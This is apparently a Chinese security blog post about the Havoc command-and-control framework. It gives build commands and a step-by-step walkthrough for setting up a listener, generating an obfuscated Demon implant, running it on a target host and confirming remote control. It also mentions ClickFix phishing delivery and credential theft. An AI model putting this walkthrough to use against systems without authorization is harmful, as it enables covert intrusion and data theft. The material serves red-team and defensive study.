文章总结: 本文介绍了现代化后渗透命令与控制框架Havoc,分析了传统C2工具的局限性,并详细阐述了Havoc的多用户协作、先进检测规避技术、高度可定制性及现代化界面等差异化优势。文章提供了Havoc的系统架构说明、依赖安装、客户端与团队服务器的构建步骤,以及创建监听器、生成载荷、部署执行和验证连接等基本操作流程。最后提及攻击者可能利用Havoc进行恶意活动,并列举了其具备的多种后渗透功能。
综合评分: 75
文章分类: 红队,内网渗透,安全工具,渗透测试,恶意软件
Havoc:现代化后渗透命令与控制(C2)工具
原创
网安武器库
网安武器库
网安武器库
2026年2月15日 21:21
山东
更多干货 点击蓝字 关注我们
注:本文仅供学习,坚决反对一切危害网络安全的行为。造成法律后果自行负责!
往期回顾
·PCHunter:一款深度检测隐藏恶意代码的扫描工具(兼容win11)
·Web-SurvivalScan:用于快速验证资产存活的轻量化渗透测试扫描工具
·【已复现】最新版微信v4.1出现远程命令执行漏洞:one-click RCE on Linux WeChat
·xss_scanner_mix:一款自动化深度XSS漏洞扫描工具
背景分析
传统 C2 工具的局限性
单一用户模式 :许多传统 C2 工具不支持多用户协作,限制了团队作战能力。
功能固化 :扩展能力有限,难以快速适应新的安全场景和防护技术。
检测规避能力不足 :传统工具的通信模式和行为特征易被现代 EDR(终端检测与响应)系统识别。
跨平台支持差 :客户端或服务器往往仅支持特定操作系统,部署和使用受限。
Havoc是一个现代化、高度可定制的后渗透命令与控制(C2)框架,由安全研究员 @C5pider 创建。它专为红队操作、渗透测试和安全研究设计,提供了一套完整的工具链,用于在目标网络中建立持久访问并执行各种后渗透活动。
Havoc 的差异化优势
1.多用户协作:团队服务器支持多用户同时操作,实现实时协作和任务分配,适合大型红队演练。2.先进的检测规避技术:集成多种睡眠混淆技术(Ekko、Ziliean、FOLIAGE)、返回地址欺骗、间接系统调用等高级技术,提高在高防护环境中的生存能力。3. 高度可定制:通过自定义 C2 配置文件、外部 C2 支持和模块化设计,允许用户根据目标环境调整策略。4.现代化用户界面:基于 Dracula 主题的深色界面,提供直观的操作体验,降低学习成本。
项目地址:
git clone https://github.com/HavocFramework/Havoc.git
或者直接使用kali(这个就不用去编译等操作,更方便):
sudo apt install havoc
介绍
系统架构
Havoc 采用三层架构设计:
- 客户端(Client)
跨平台用户界面,使用 C++ 和 Qt 开发现代化深色主题,基于 Dracula 设计提供直观的操作界面,用于管理监听器、代理和执行命令
- 团队服务器(Teamserver)
使用 Golang 开发支持多用户协作负责有效载荷生成、监听器管理和客户端通信提供 HTTP/HTTPS 监听器和自定义 C2 配置文件
- 代理(Demon)
Havoc 的核心代理,使用 C 和汇编开发提供强大的后渗透功能支持多种高级技术,如睡眠混淆、返回地址欺骗和间接系统调用
操作
依赖组件:
sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev libspdlog-dev python3-dev libboost-all-dev mingw-w64 nasm
客户端构建
cd Havoc/Clientmake./Havoc
Teamserever构建
cd Havoc/Teamserver go mod download golang.org/x/sys go mod download github.com/ugorji/go
cd Teamserver
# Install MUSL C Compiler./Install.sh
# Build Binarymake./teamserver -h
# Run the teamserversudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug
工具使用
客户端cd Havoc/Client ./Havoc
Teamserver连接
创建 HTTP 监听器
-
点击 “Listeners” 标签
-
点击 “Add” 按钮
-
选择 “HTTP” 类型
-
配置:
- Name :HTTP_Listener - Bind Address :0.0.0.0 - Port :80 - Profile :选择默认配置文件
- 点击 “Save” 保存并启动
生成 EXE 有效载荷
-
点击 “Payloads” 标签
-
选择 “Demon” 类型
-
配置:
- Listener :HTTP_Listener - Output :exe - Architecture :x64 - Sleep :60000 - Obfuscation :Ekko
-
点击 “Generate” 生成
-
保存为 payload.exe
部署并执行有效载荷
-
通过网络共享将 payload.exe 复制到目标主机
-
在目标主机上执行: C:\share\payload.exe
验证连接
-
客户端 “Sessions” 标签中出现新会话
-
双击会话进入控制台
-
执行 whoami 命令,确认命令执行成功
-
执行 systeminfo 命令,获取目标主机信息
攻击者修改了 Havoc 的“Demon”代理以逃避检测并促进秘密行动。
该恶意软件通过利用一种称为“ClickFix”的方法的网络钓鱼活动进行传播。攻击从一封电子邮件开始,该电子邮件包含一个名为“Documents.html”的 HTML 附件。打开后,此文件会显示一条错误消息,指示用户复制并运行 PowerShell 命令。这个看似简单的步骤启动了感染过程,使攻击者能够控制受害者的系统。
一旦安装在受感染的系统上,Havoc 就会为攻击者提供一套工具来执行命令、操纵用户权限、窃取敏感数据,甚至进行 Kerberos 攻击。其功能包括:
收集系统和用户信息执行文件操作,例如上传和下载数据执行任意命令和有效载荷操纵用户令牌来提升权限进行网络侦察和凭证盗窃
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:网安武器库 网安武器库
网安武器库《Havoc:现代化后渗透命令与控制(C2)工具》